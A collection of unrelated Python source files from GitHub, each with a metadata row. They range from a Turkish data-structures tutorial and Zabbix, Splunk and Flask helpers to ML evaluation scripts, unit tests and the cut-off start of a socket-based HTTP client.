liste = ["anil", "rumeysa", "tilda"]
liste = liste + ["defne"]
print(liste)
# Eleman Silme;
liste = ["anil", "rumeysa", "tilda", "defne"]
del liste[3]
print(liste)
# METODLAR ile Listelere eleman EKLEME / SILME
# "apppend" metodu / Ekleme;
liste = ["anil", "rumeysa", "tilda"]
liste.append("defne")
print(liste)
# "remove" metodu / Silme;
liste = ["anil", "rumeysa", "tilda", "defne"]
liste.remove("defne")
print(liste)
# INDEXLERE göre Listelere eleman EKLEME / SİLME
# "insert" metodu;
liste = ["anil", "rumeysa", "tilda"]
liste.insert(1, "hakan") # Degisiklik kalici degil, 1. elemana ekleme yaptik.
print(liste)
# Listenin en sonuda eklemek icin;
liste = ["anil", "rumeysa", "tilda"]
liste.insert(len(liste), "defne")
print(liste)
# "pop" metodu;
liste = ["anil", "hakan", " rumeysa", "tilda"]
liste.pop(1)
print(liste)
# Diger Liste metodlari
# "count" / Sayma Metodu;
liste = ["anil", "hakan", " rumeysa", "tilda"]
liste.count("hakan")
# "copy" / Kopyalama Metodu (Mevcut listeyi kopyalamak icin kullanilir.);
liste = ["anil", "rumeysa", "tilda"]
liste_yedek = liste.copy()
print(liste_yedek)
# "extend" metodu (iki listeyi birlestirmek icin kullanilir.);
liste = ["anil", "rumeysa", "tilda"]
liste.extend(["hakan", "melda", "defne"])
print(liste)
liste = ["anil", "rumeysa", "tilda"]
liste2 = ["hakan", "melda", "defne"]
liste.extend(liste2)
print(liste)
# "index" metodu (Bir elemanin hangi indexte oldugunu bulma metodu);
liste = ["anil", "rumeysa", "tilda"]
liste.index("anıl")
# "reverse" metodu (listeyi ters cevirme);
liste = ["anil", "rumeysa", "tilda"]
liste.reverse()
print(liste)
liste = ["anil", "rumeysa", "tilda"]
liste2 = ["hakan", "melda", "defne"]
liste.extend(liste2)
liste.reverse()
print(liste)
# "sort" metodu (sayilarda siralama);
liste_sayilar = [16, 12, 2020]
liste_sayilar.sort()
print(liste_sayilar)
liste_sayilar = [3, 16, 5, 12, 7, 13, 650, 200, 2020]
liste_sayilar.sort()
print(liste_sayilar)
# "clear" / Silme Metodu;
liste_sayilar = [16, 12, 2020]
liste_sayilar.clear()
print(liste_sayilar)
## 2) Tuple Olusturma (tupleler "SABIT VERİ YAPILARI" dir ve DEGISTIRELEMEZLER.);
t = ("anil", "rumeysa", "tilda", 16, 12, 2020)
type(t)
t = ("anil")
type(t) # Tek nesne olunca sonuna virgul koyulmazsa tipini str sanar.
t = ("anil",)
print(type(t))
# Erisim islemi;
t = ("anil", "rumeysa", "tilda", 16, 12, 2020)
print(t[4]) # DEGISIM ISLEMI YAPILAMAZ!
## 3) Dictionary Olusturma (key - value ikisi de hem str hem int olabilir.);
sozluk = {"REG": "Regrasyon Modeli",
"LOJ": "Lojistik Regrasyon",
"CART": "Classification and Reg."}
print(len(sozluk))
# value'lar iki ya da daha fazla degere de karsilik gelebilirler;
sozluk = {"REG": ["RMS", 10],
"LOJ": ["MSE", 20],
"CART": ["SSE", 30]}
print(len(sozluk))
# Icerisindeki elemana ulasma;
print(sozluk["REG"])
# Sozluk icerisinde sozluk olusturma ve icerisindeki elemana ulasma;
sozluk = {"REG": {"RMSE": 10,
"MSE": 20,
"SSE": 30},
"LOJ": {"RMSE": 10,
"MSE": 20,
"SSE": 30}}
print(sozluk["REG"]["SSE"])
# Dictionaryde EKLEME ve DEGISTIRME;
sozluk = {"REG": "Regrasyon Modeli",
"LOJ": "Lojistik Regrasyon",
"CART": "Classification and Reg."}
sozluk["GBM"] = "Gradient Boosting Mac." # key ile birlikte ekleme
print(sozluk)
# Var olan key degeri yakalanip atama islemi yapilarak degisiklik yapilir;
sozluk = {"REG": "Regrasyon Modeli",
"LOJ": "Lojistik Regrasyon",
"CART": "Classification and Reg."}
sozluk["REG"] = "Çoklu Doğrusal Regresyon" # "=" işaretine dikkat et!
print(sozluk)
# Key'ler sadece sabit veri yapilariyla olusturulur;
# str, int, tuple (listeler, sabit veri yapisi olmadigindan key olamazlar. Valueler icin bu durum soz konusu degil)
## 4) SET (Kume) Olusturma;
# Liste uzerinden set olusturma;
liste = [1, "r", "rumeysa", 123]
print(set(liste))
# Tuple uzerinden set olusturma;
t = (1, "r", "rumeysa", 123,)
print(set(t))
# Essizlik ozelligi;
rhsh = "rumeysa_her_seyi_halledecek."
print(set(rhsh))
s = set(rhsh)
print(len(rhsh))
print(len(s))
# Setler sirasizdir, index islemlerini desteklemez.
# Setlerden elemen EKLEME / CIKARMA;
rhsh = "rumeysa", "halledecek."
s = set(rhsh)
# "add" / Ekleme metodu;
s.add("her seyi")
print(s)
# "remove" / Cikarma metodu;
rhsh = "rumeysa", "her seyi", "halledecek"
s = set(rhsh)
s.remove("her seyi")
print(s)
s.remove(
"her seyi") # Keyerror verdi. Cünkü; daha önce silmistik, sildigimden emin olup hata almamak icin kaldirma islemini "discard" ile yapariz.
print(s)
rhsh = "rumeysa", "her seyi", "halledecek"
s = set(rhsh)
s.remove("her seyi")
print(s)
s.discard("her seyi") # Silecek bir sey bulmadi ama yine de uyari vermedi!
print(s)
# SETLERDE FARK ISLEMLERİ
# Fark: difference() or "-"
# Kesisim: intersection() or "&"
# Birlesim: union()
# Birbirinde olmayanlar: symmetric_difference()
set1 = set([1, 3, 5]) # Listeden set olusturduk.
set2 = set([1, 2, ])
print(set1 - set2) # set1'de olup set2'de olmayan elemanlar
print(set1.difference(set2))
print(set2 - set1) # set2'de olup set1'de olmayan elemanlar
print(set2.difference(set1))
print(set1 & set2)
print(set1.intersection(set2)) # Tanimlama yapmadikca kalici olmaz.
kesişim = set1.intersection(set2)
print(kesişim)
print(set1.union(set2)) # Birlesim
print(set2.union(set1))
union = set1.union(set2) # Her bir eleman bir defa alinir.
print(union)
# Kesişimden yeni eleman olusturma;
set1 = set([1, 3, 5])
set2 = set([1, 2, 3])
set1.intersection_update(set2)
print(set1)
# Setlerde Sorgu Islemi;
set1 = set([1, 3, 5])
set2 = set([1, 2, 3])
set1.isdisjoint(set2) # Kesisim bos mu?
set1 = set([1, 3, 5])
set2 = set([1, 2, 3])
set1.issubset(set2) # set1, set2'nin alt kumesi mi?
set1 = set([1, 3, 5])
set2 = set([1, 2, 3])
set1.issuperset(set2) # Set1, Set2'yi kapsiyor mu?
# Liste'ler: Degistirilebilir, Sirali, Kapsayici
# Tuple'lar: Degistirilemez, Sirali, Kapsayici
# Sozluk: Degistirilebilir, Sirali, Kapsayici,
# Set'ler: Degistirilebilir, Sirasiz-Essiz, Kapsayici
|
Rumeysaislam/data-analysis-course
|
-4-Veri-Yapıları.py
|
-4-Veri-Yapıları.py
|
py
| 7,616 |
python
|
tr
|
code
| 0 |
github-code
|
6
|
27356830765
|
import random
import os
from helpers import *
from keras.models import model_from_json
# load json and create model
json_file = open('saved_models/model.json', 'r')
loaded_model_json = json_file.read()
json_file.close()
model = model_from_json(loaded_model_json)
# load weights into new model
model.load_weights("saved_models/CNN_model.h5")
path = '../DR_data/vins'
#file = random.choice(os.listdir(path))
file = '1AYEN45963S374568_Agane_light.ttf245.png'
# file = '6TNEF59347P425193_verdana.ttf225.png'
# Read the input image
im = cv2.imread(path + '/' + file)
cv2.imshow("Original Image with Rectangular ROIs {}".format(file), im)
cv2.waitKey()
'''
VIN CONTAINS 17 numbers
letters are capital
1 number
4 letters
5 numbers
1 letter
6 numbers
Perhaps can tran two models for numbers and letters but for now won't do that
number_positions = [0, 5, 6, 7, 8, 9, 11, 12, 13, 14, 15, 16]
letters_positions = [1, 2, 3, 4, 10]
'''
vin = []
ROIs = detect_characters(im, path + '/' + file)
for roi in ROIs:
roi = np.expand_dims(roi, axis=0) # need this if I want to predict on a single image
prediction = model.predict(roi)
vin.append(prediction)
classes = ['1', '2', '3', '4', '5', '6', '7', '8', '9', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'J', 'K', 'L', 'M', 'N',
'P', 'R', 'S', 'T', 'V', 'W', 'X', 'Y']
vins = np.array(vin)
''.join([str(e) for e in vins])
print(vins)
vin_string = ''
for vin in vins:
for pred_list in vin:
for index, pred in enumerate(pred_list):
if int(pred) == 1:
predicted_value = classes[index]
vin_string += predicted_value
break
print(vin_string)
print(file[:17])
cv2.imshow("Resulting Image with Rectangular ROIs", im)
cv2.waitKey()
|
pekkipo/Characters_recognition
|
predict_characters.py
|
predict_characters.py
|
py
| 1,793 |
python
|
en
|
code
| 1 |
github-code
|
6
|
26305089118
|
#!/usr/bin/python3
"""Module containing the definition for a class of type square"""
Rectangle = __import__('9-rectangle').Rectangle
class Square(Rectangle):
"""Class representing a square"""
def __init__(self, size):
"""method to be called on instantiation"""
self.integer_validator("size", size)
super().__init__(size, size)
self.__size = size
|
AndyMSP/holbertonschool-higher_level_programming
|
0x0A-python-inheritance/10-square.py
|
10-square.py
|
py
| 390 |
python
|
en
|
code
| 0 |
github-code
|
6
|
16119657095
|
__author__ = 'burgosz'
from django import template
register = template.Library()
from zabbix_reports.templatetags.zabbix_call import zbx_call
from django.core.cache import cache
@register.assignment_tag
def zbx_service_container_get():
services = []
return services
# Iterate over services and get the service ids in order with there level of deepness.
def _zbx_service_ids_get_deep(topids, service_ids, level=0):
topidstostring = '["'+'","'.join(str(e) for e in topids)+'"]'
args = "{'parentids': "+topidstostring+", 'output': 'extend'}"
services = zbx_call('service.get', args)
services = sorted(services['result'], key=lambda srv: srv['name'])
for service in services:
service_ids.append({'id': str(service['serviceid']), 'level': str(level)})
pids = []
pids.append(int(service['serviceid']))
level += 1
_zbx_service_ids_get_deep(pids, service_ids, level)
level -= 1
return_value = '["'+'","'.join(str(e['id']) for e in service_ids)+'"]'
return return_value
@register.assignment_tag
def zbx_service_ids_get_deep(topids, service_ids, level=0):
# Cache the service ids
key = "deep_"+'["'+'","'.join(str(e) for e in topids)+'"]'
cached = cache.get(key)
if cached:
for cached_srv in cached:
service_ids.append(cached_srv)
return '["'+'","'.join(str(e['id']) for e in service_ids)+'"]'
else:
return_value = _zbx_service_ids_get_deep(topids, service_ids, level)
cache.set(key, service_ids, None)
return return_value
|
burgosz/zabbix_reports
|
templatetags/zabbix_services.py
|
zabbix_services.py
|
py
| 1,574 |
python
|
en
|
code
| 5 |
github-code
|
6
|
8257193173
|
import logging
from typing import Mapping
from datetime import datetime
import attr
from .dixel import Dixel
from ..utils import Pattern, DatetimeInterval, gateway
from ..utils.dicom import DicomLevel
# splunk-sdk is 2.7 only, so diana.utils.gateway provides a minimal query/put replacement
# Suppress insecure warning
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
@attr.s
class Splunk(Pattern):
host = attr.ib( default="localhost" )
port = attr.ib( default="8000" )
user = attr.ib( default="splunk" )
protocol = attr.ib( default="http" )
password = attr.ib( default="admin" )
hec_protocol = attr.ib( default="http" )
hec_port = attr.ib( default="8088" )
gateway = attr.ib( init=False )
hec_tokens = attr.ib( factory=dict ) # Mapping of domain name -> token
default_token = attr.ib( default=None )
default_index = attr.ib( default='main' )
@gateway.default
def connect(self):
# Create a Service instance and log in
return gateway.Splunk(
host=self.host,
port=self.port,
protocol = self.protocol,
hec_port=self.hec_port,
hec_protocol=self.hec_protocol,
user=self.user,
password=self.password
)
def add_hec_token(self, name: str, token: str):
self.hec_tokens[name] = token
def find_items(self,
query: Mapping,
time_interval: DatetimeInterval=None):
results = self.gateway.find_events(query, time_interval)
# logging.debug("Splunk query: {}".format(query))
# logging.debug("Splunk results: {}".format(results))
if results:
worklist = set()
for d in results:
worklist.add( Dixel(meta=d, level=DicomLevel.of( d['level'] ) ) )
# logging.debug(worklist)
return worklist
def put(self, item: Dixel, host: str, token: str, index: str=None ):
logging.debug("Putting in Splunk")
if item.meta.get('InstanceCreationDateTime'):
timestamp = item.meta.get('InstanceCreationDateTime')
elif item.meta.get('StudyDateTime'):
timestamp = item.meta.get('StudyDateTime')
else:
logging.warning("Failed to get inline 'DateTime', using now()")
timestamp = datetime.now()
event = item.meta
event['level'] = str(item.level)
event['oid'] = item.oid()
if not token:
token=self.default_token
_token = self.hec_tokens.get(token)
if not index:
index=self.default_index
self.logger.debug(timestamp)
self.logger.debug(event)
self.logger.debug(index)
self.logger.debug(_token)
_host = "{}@{}".format(host, self.hostname)
# at $time $event was reported by $host for $index with credentials $auth
self.gateway.put_event( timestamp=timestamp, event=event, host=_host, index=index, token=_token )
# Real auth description
# headers = {'Authorization': 'Splunk {0}'.format(self.hec_tok[hec])}
|
derekmerck/DIANA
|
packages/diana/diana/apis/splunk.py
|
splunk.py
|
py
| 3,138 |
python
|
en
|
code
| 11 |
github-code
|
6
|
14153199843
|
from models import Pet,db,connect_db
from app import app
connect_db(app)
db.drop_all()
db.create_all()
pet1 = Pet(
name="Keeshond",
species="dog",
photo_url="http://cdn.akc.org/content/article-body-image/keeshond_dog_pictures.jpg",
age=2,
notes="I love this Dog")
pet2 = Pet(
name="Sherry",
species="dog",
photo_url="http://cdn.akc.org/content/article-body-image/newfoundland_dog_pictures.jpg",
age=3,
notes="Good Enough"
)
pet3 = Pet(
name = "Modena",
species = "dog",
photo_url = "http://cdn.akc.org/content/article-body-image/golden_puppy_dog_pictures.jpg",
age = 2
)
pet4 = Pet(
name = "Fiona",
species = "dog",
photo_url = "http://cdn.akc.org/content/article-body-image/great_pyr_puppy_dog_pictures_.jpg",
age = 1,
notes= "Hello,World"
)
pet5 = Pet(
name = "Andy",
species = "dog",
photo_url = "http://cdn.akc.org/content/article-body-image/Finnishlapphundpuppies_dog_pictures.jpg",
age = 1,
notes = "I'm Chihuahua"
)
db.session.add(pet1)
db.session.add(pet2)
db.session.add(pet3)
db.session.add(pet4)
db.session.add(pet5)
db.session.commit()
|
nickchow2020/Adoption-Agency
|
seed.py
|
seed.py
|
py
| 1,193 |
python
|
en
|
code
| 0 |
github-code
|
6
|
35473650215
|
from tensorflow.keras.models import load_model
from delta import calculate_gt
from loss import detection_loss, ssd_loss
import numpy as np
import pickle
from nms import non_maximum_suppression
from utils import images_with_rectangles, plot_images, xywh2xyxy, draw_rectangles
# load models
model = load_model('../models/best_model.h5', custom_objects={'ssd_loss': ssd_loss})
# load dataset
train_xs = np.load('../datasets/debug_true_images.npy')
train_ys = np.load('../datasets/debug_true_labels.npy')
trues_delta = xywh2xyxy(train_ys[..., :4])
trues_cls = train_ys[..., -1]
# load default_boxes
f = open('../datasets/default_boxes_bucket.pkl', 'rb')
default_boxes_bucket = pickle.load(f)
default_boxes = np.concatenate(default_boxes_bucket, axis=0)
# predictions with batch images
preds = model.predict(x=train_xs)
preds_onehot = preds[..., 4:] # shape=(N_img, N_anchor, n_classes)
preds_delta = preds[..., :4] # shape=(N_img, N_anchor, 4)
# change relative coords to absolute coords for predictions
gts_hat = calculate_gt(default_boxes, preds_delta) # shape=(N_img, N_anchor, 4)
# change relative coords to absolute coords for groundruths
gts = calculate_gt(default_boxes, trues_delta) # shape=(N_img, N_anchor, 4)
# get foreground(not background) bool mask for prediction, shape (N_img, N_default_boxes)
preds_cls = np.argmax(preds_onehot, axis=-1) # shape (N_img, N_default_boxes)
pos_preds_mask = (preds_cls != 10) # shape (N_img, N_default_boxes)
# get foreground bool mask for true, shape (N_img, N_default_boxes)
pos_trues_mask = (trues_cls != 10) # shape (N_img, N_default_boxes)
# 이미지 한장당 positive localization, classification 정보를 가져옵니다.
pos_preds_loc = []
pos_preds_cls = []
pos_preds_onehot = []
for pos_pred_mask, gt_hat, pred_cls, pred_onehot in zip(pos_preds_mask, gts_hat, preds_cls, preds_onehot):
pos_loc = gt_hat[pos_pred_mask]
pos_cls = pred_cls[pos_pred_mask]
pos_mask = pred_onehot[pos_pred_mask]
pos_preds_loc.append(pos_loc)
pos_preds_cls.append(pos_cls)
pos_preds_onehot.append(pos_mask)
# Non Maximum Suppression per image
nms_bboxes = []
for onehot_, loc_, cls_ in zip(pos_preds_onehot, pos_preds_loc, pos_preds_cls):
final_bboxes, _, _ = non_maximum_suppression(loc_, onehot_, 0.5)
final_bboxes = xywh2xyxy(np.array(final_bboxes))
nms_bboxes.append(final_bboxes)
# 이미지 한장당 positive localization, classification 정보를 가져옵니다.
pos_trues_loc = []
pos_trues_cls = []
for pos_pred_mask, gt, true_cls in zip(pos_trues_mask, gts, trues_cls):
pos_loc = gt[pos_pred_mask]
pos_cls = true_cls[pos_pred_mask]
pos_loc = xywh2xyxy(pos_loc)
pos_trues_loc.append(pos_loc)
pos_trues_cls.append(pos_cls)
# visualization prediction
rected_images = images_with_rectangles(train_xs * 255, pos_trues_loc, color=(0, 255, 0))
plot_images(rected_images)
rected_images = images_with_rectangles(train_xs * 255, nms_bboxes, color=(255, 255, 0))
plot_images(rected_images)
|
taila0/single-shot-multibox-detector
|
src/main_eval.py
|
main_eval.py
|
py
| 3,001 |
python
|
en
|
code
| 0 |
github-code
|
6
|
25755944520
|
import unittest
from datetime import date, datetime
from constants import (
STATUS_IN_PROGRESS,
STATUS_COMPLETED,
TASK_UPDATED,
PRIORITY_HIGH,
PRIORITY_MEDIUM,
PRIORITY_LOW,
TASK1,
TASK2,
TASK3
)
from main import app, bd
from models.task_model import Task
from repository.task_repository import TaskRepository
from service.task_service import get_all_tasks, create_task, update_task, delete_task
class TaskServiceTestCase(unittest.TestCase):
def setUp(self):
app.testing = True
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///test.db'
self.app_context = app.app_context()
self.app_context.push()
bd.create_all()
self.client = app.test_client()
self.repository = TaskRepository()
def tearDown(self):
bd.session.remove()
bd.drop_all()
def test_get_all_tasks(self):
task1 = Task(
name=TASK1,
priority=PRIORITY_HIGH,
start_date=date.today(),
planned_end_date=date.today(),
actual_end_date=None,
status=STATUS_IN_PROGRESS,
project_id='1'
)
task2 = Task(
name=TASK2,
priority=PRIORITY_MEDIUM,
start_date=date.today(),
planned_end_date=date.today(),
actual_end_date=None,
status=STATUS_IN_PROGRESS,
project_id='2'
)
task3 = Task(
name=TASK3,
priority=PRIORITY_LOW,
start_date=date.today(),
planned_end_date=date.today(),
actual_end_date=None,
status=STATUS_IN_PROGRESS,
project_id='3'
)
self.repository.create(task1)
self.repository.create(task2)
self.repository.create(task3)
tasks_project1 = get_all_tasks(task1.project_id)
tasks_project2 = get_all_tasks(task2.project_id)
tasks_project3 = get_all_tasks(task3.project_id)
self.assertEqual(len(tasks_project1), 1)
self.assertEqual(tasks_project1[0]['name'], TASK1)
self.assertEqual(tasks_project1[0]['priority'], PRIORITY_HIGH)
self.assertEqual(tasks_project1[0]['start_date'], date.today().strftime('%Y-%m-%d'))
self.assertEqual(tasks_project1[0]['planned_end_date'], date.today().strftime('%Y-%m-%d'))
self.assertIsNone(tasks_project1[0]['actual_end_date'])
self.assertEqual(tasks_project1[0]['status'], STATUS_IN_PROGRESS)
self.assertEqual(len(tasks_project2), 1)
self.assertEqual(tasks_project2[0]['name'], TASK2)
self.assertEqual(tasks_project2[0]['priority'], PRIORITY_MEDIUM)
self.assertEqual(tasks_project2[0]['start_date'], date.today().strftime('%Y-%m-%d'))
self.assertEqual(tasks_project2[0]['planned_end_date'], date.today().strftime('%Y-%m-%d'))
self.assertIsNone(tasks_project2[0]['actual_end_date'])
self.assertEqual(tasks_project2[0]['status'], STATUS_IN_PROGRESS)
self.assertEqual(len(tasks_project3), 1)
self.assertEqual(tasks_project3[0]['name'], TASK3)
self.assertEqual(tasks_project3[0]['priority'], PRIORITY_LOW)
self.assertEqual(tasks_project3[0]['start_date'], date.today().strftime('%Y-%m-%d'))
self.assertEqual(tasks_project3[0]['planned_end_date'], date.today().strftime('%Y-%m-%d'))
self.assertIsNone(tasks_project3[0]['actual_end_date'])
self.assertEqual(tasks_project3[0]['status'], STATUS_IN_PROGRESS)
def test_create_task(self):
project_id = 1
data = {
'name': 'New Task',
'priority': 'High',
'status': 'In Progress',
'planned_end_date': '2023-07-20'
}
create_task(project_id, data)
task = self.repository.get_all()[0]
self.assertIsNotNone(task.id)
self.assertEqual(task.name, 'New Task')
self.assertEqual(task.priority, 'High')
self.assertEqual(task.start_date, date.today())
self.assertEqual(task.planned_end_date, datetime.strptime(data['planned_end_date'], '%Y-%m-%d').date())
self.assertIsNone(task.actual_end_date)
self.assertEqual(task.status, 'In Progress')
self.assertEqual(task.project_id, 1)
def test_update_task(self):
task = Task(
name=TASK1,
priority=PRIORITY_HIGH,
start_date=date.today(),
planned_end_date=date.today(),
actual_end_date=None,
status=STATUS_IN_PROGRESS
)
self.repository.create(task)
data = {
'name': TASK_UPDATED,
'priority': PRIORITY_MEDIUM,
'status': STATUS_COMPLETED
}
update_task(task.id, data)
updated_task = self.repository.get_by_id(task.id)
self.assertEqual(updated_task.name, TASK_UPDATED)
self.assertEqual(updated_task.priority, PRIORITY_MEDIUM)
self.assertEqual(updated_task.status, STATUS_COMPLETED)
def test_delete_task(self):
task_data = {
'name': TASK1,
'priority': PRIORITY_HIGH,
'start_date': date.today(),
'planned_end_date': date.today(),
'actual_end_date': None,
'status': STATUS_IN_PROGRESS
}
task = Task(**task_data)
self.repository.create(task)
task_id = task.id
delete_task(task_id)
deleted_task = self.repository.get_by_id(task_id)
self.assertIsNone(deleted_task)
# def setUp(self):
# app.testing = True
# app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///test.db'
# self.app_context = app.app_context()
# self.app_context.push()
# bd.create_all()
# self.client = app.test_client()
# self.repository = TaskRepository()
#
# def tearDown(self):
# bd.session.remove()
# bd.drop_all()
if __name__ == '__main__':
unittest.main()
|
dan9Protasenia/task-management
|
tests/test_task_service.py
|
test_task_service.py
|
py
| 5,950 |
python
|
en
|
code
| 0 |
github-code
|
6
|
73871407226
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Apr 27 20:09:14 2020
@author: scro3517
"""
import torch
import torch.nn as nn
import torch.nn.functional as F
c1 = 1 #b/c single time-series
c2 = 4 #4
c3 = 16 #4
c4 = 32 #4
k=7 #kernel size
s=3 #stride
#num_classes = 3
class cnn_network_time(nn.Module):
""" CNN Implemented in Original Paper - Supposedly Simple but Powerful """
def __init__(self,dropout_type,p1,p2,p3,classification,heads='single'):
super(cnn_network_time,self).__init__()
if classification is not None and classification != '2-way':
num_classes = int(classification.split('-')[0])
elif classification == '2-way':
num_classes = 1
embedding_dim = 100 #100
#self.conv1 = nn.Conv2d(c1,c2,k,s)
self.conv1 = nn.Conv1d(c1,c2,k,s)
self.batchnorm1 = nn.BatchNorm1d(c2)
#self.conv2 = nn.Conv2d(c2,c3,k,s)
self.conv2 = nn.Conv1d(c2,c3,k,s)
self.batchnorm2 = nn.BatchNorm1d(c3)
#self.conv3 = nn.Conv2d(c3,c4,k,s)
self.conv3 = nn.Conv1d(c3,c4,k,s)
self.batchnorm3 = nn.BatchNorm1d(c4)
self.linear1 = nn.Linear(c4*10,embedding_dim)
self.linear2 = nn.Linear(embedding_dim,num_classes)
self.oracle_head = nn.Linear(embedding_dim,1) #I may have to comment out when performing inference for ALPS
self.heads = heads
self.relu = nn.ReLU()
self.selu = nn.SELU()
self.maxpool = nn.MaxPool1d(2)
#self.fracmaxpool = nn.FractionalMaxPool2d(2,output_ratio=0.50) #kernel size, output size relative to input size
if dropout_type == 'drop1d':
self.dropout1 = nn.Dropout(p=p1) #0.2 drops pixels following a Bernoulli
self.dropout2 = nn.Dropout(p=p2) #0.2
self.dropout3 = nn.Dropout(p=p3)
elif dropout_type == 'drop2d':
self.dropout1 = nn.Dropout2d(p=p1) #drops channels following a Bernoulli
self.dropout2 = nn.Dropout2d(p=p2)
self.dropout3 = nn.Dropout2d(p=p3)
#self.alphadrop1 = nn.AlphaDropout(p=0.1) #used primarily with selu activation
def forward(self,x):
x = self.dropout1(self.maxpool(self.relu(self.batchnorm1(self.conv1(x)))))
x = self.dropout2(self.maxpool(self.relu(self.batchnorm2(self.conv2(x)))))
x = self.dropout3(self.maxpool(self.relu(self.batchnorm3(self.conv3(x)))))
x = torch.reshape(x,(x.shape[0],x.shape[1]*x.shape[2]))
x = self.relu(self.linear1(x))
out = self.linear2(x)
if self.heads == 'multi':
p = self.oracle_head(x)
return (out,p)
else:
return out
#%%
class cnn_network_image(nn.Module):
def __init__(self,dropout_type,p1,p2,p3,classification,heads='single'):
super(cnn_network_image, self).__init__()
self.conv1 = nn.Conv2d(3, 6, 5)
self.pool = nn.MaxPool2d(2, 2)
self.conv2 = nn.Conv2d(6, 16, 5)
self.fc1 = nn.Linear(16 * 5 * 5, 120)
self.fc2 = nn.Linear(120, 84)
self.fc3 = nn.Linear(84, 10)
self.dropout1 = nn.Dropout(p=p1) #0.2 drops pixels following a Bernoulli
self.dropout2 = nn.Dropout(p=p2) #0.2
#self.dropout3 = nn.Dropout(p=p3)
self.oracle_head = nn.Linear(84,1) #I may have to comment out when performing inference for ALPS
self.heads = heads
def forward(self, x):
x = self.pool(F.relu(self.conv1(x)))
x = self.pool(F.relu(self.conv2(x)))
x = x.view(-1, 16 * 5 * 5)
x = self.dropout1(F.relu(self.fc1(x)))
x = self.dropout2(F.relu(self.fc2(x)))
out = self.fc3(x)
if self.heads == 'multi':
p = self.oracle_head(x)
return (out,p)
else:
return out
|
danikiyasseh/SoQal
|
prepare_network.py
|
prepare_network.py
|
py
| 3,891 |
python
|
en
|
code
| 4 |
github-code
|
6
|
41971622331
|
#!/usr/local/bin/python3
'''
Created on Mar 8, 2013
For interview test
Consider a log file that showed important network events including packet drops. Log format is below:
2012-12-29 22:00 172.16.8.48 drops 24 packets
2012-12-29 22:01 172.16.8.48 buffer full
2012-12-29 22:02 172.16.8.45 drops 21 packets
2012-12-29 22:03 172.16.8.44 drops 10 packets
2012-12-29 22:04 172.16.8.48 drops 10 packets
2012-12-29 22:04 172.16.8.48 latency 3 seconds
2012-12-29 22:03 172.16.8.45 drops 2 packets
Write a script that generates a report of total packets dropped per IP address. Report format is below:
172.16.8.48 drops total 34 packets
172.16.8.45 drops total 23 packets
172.16.8.44 drops total 10 packets
OPTIONAL BONUS: Sort the report by IP address, like this:
172.16.8.44 drops total 10 packets
172.16.8.45 drops total 23 packets
172.16.8.48 drops total 34 packets
@author: rduvalwa2
'''
report = {}
open_testFile = open('testfile.txt', 'r').readlines() # open and read from same expression
string_trigger = "drops"
for line in open_testFile:
if line.find(string_trigger) > 1:
words = line.strip().split()
report[words[2]] = words[4]
print("Unsorted Report")
for ip in report:
print(ip, "drops total" , report[ip], "packets")
print("Sorted Report")
for ip in sorted(report):
print(ip, "drops total" , report[ip], "packets")
|
rduvalwa5/TinkerGui
|
GUI_projects/Py2_Lessons/src/log_report.py
|
log_report.py
|
py
| 1,373 |
python
|
en
|
code
| 0 |
github-code
|
6
|
20399194189
|
with open('../src/mem.S', 'r') as f:
lines = f.readlines()
output = []
ignore = False
for line in lines:
if '# python start jacklight' in line:
ignore = True
elif '# python end jacklight' in line:
ignore = False
output.append(line)
elif not ignore:
output.append(line)
with open('../src/mem.S', 'w') as f:
f.writelines(output)
|
Qpicpicxxz/Venus-scheduler
|
task/rollback_mem.py
|
rollback_mem.py
|
py
| 382 |
python
|
en
|
code
| 1 |
github-code
|
6
|
40786176947
|
import pandas as file
import matplotlib.pyplot as plt
import numpy as np
from sklearn.cluster import KMeans
from sklearn import cluster, datasets, metrics
#分群 K-means
model = KMeans(n_clusters = 16)
data = file.read_csv("./data.csv")
data.drop(['id'],axis=1)
predict = model.fit(data).labels_
ans = []
for row in predict:
ans.append(row)
test = file.read_csv("./test.csv")
test0 = test['0']
test1 = test['1']
#Output Ans
with open('output.csv', 'w') as f:
f.write("index,ans\n")
for i in range(len(test)):
if(ans[test0.iloc[i]] != ans[test1.iloc[i]]):
f.write(str(i) + "," + str(0) + "\n")
else:
f.write(str(i) + "," + str(1) + "\n")
|
kiper00/DataMining
|
Hw2/Hw.py
|
Hw.py
|
py
| 694 |
python
|
en
|
code
| 0 |
github-code
|
6
|
9414662626
|
import socket ##required
import argparse ##gets argument from command line
import sys ##system calls
import re ## parsing string
BUFF_SIZE = 4096
TIMEOUT_SIZE = 2
neededInfo = { #contains everything that i need in my log
'url':None,
'sName':None,
'sIp':None,
'sPort':None,
'Path':None,
'cIp':None,
'cPort':None,
'msg':None,
'html_msg':None
}
parser = argparse.ArgumentParser(description='Getting the HTTP request input')
parser.add_argument('input', type=str, help='User input', nargs='+')
cmd_input = parser.parse_args().input
url = cmd_input[0]
http_exists = True
parsed = re.search(r"(?P<http>https*)://?(?P<site>(\w+\.?)+):?(?P<port>\d*)?(?P<path>/.*)?", url)
if(parsed == None):
http_exists = False
parsed = re.search(r"(?P<site>(\w+\.?)+):?(?P<port>\d*)?(?P<path>/.*)?", url)
#regex checking if they exist thru regex
check_host = re.findall("[a-z]+\.\w+\.[a-z]+", url)
check_domain = re.findall("([a-zA-Z0-9]+\.[a-z]+)", url)
check_ip = re.findall("([0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3})", url)
if (len(check_host) == 0 and len(check_domain) == 0 and len(check_ip) == 0):
sys.exit("Couldn't find host " + url)
if(parsed == None):
sys.exit("Parsed argument errored.")
if(http_exists == True):
rawr = parsed.group('http')
https_true = False ##cannot support https check if it is and if so print error
if( rawr == "https"):
https_true = True
if (https_true == True ):
sys.exit("HTTPS is not supported.")
##Port settings
rawr = parsed.group('port')
port_true = False
port_empty = False
if( rawr == None):
port_empty = True
if( rawr == "443" ):
port_true = True
if(port_empty == True):
neededInfo['sPort'] = int(parsed.group('port'))
else:
neededInfo['sPort'] = 80
# set sName and sIp
multi_input = False
rawr = parsed.group('site')
if(len(cmd_input) ==2):
multi_input = True
if(multi_input == False):
neededInfo['sName'] = rawr
neededInfo['sIp'] = socket.gethostbyname(neededInfo['sName'])
if(multi_input == True):
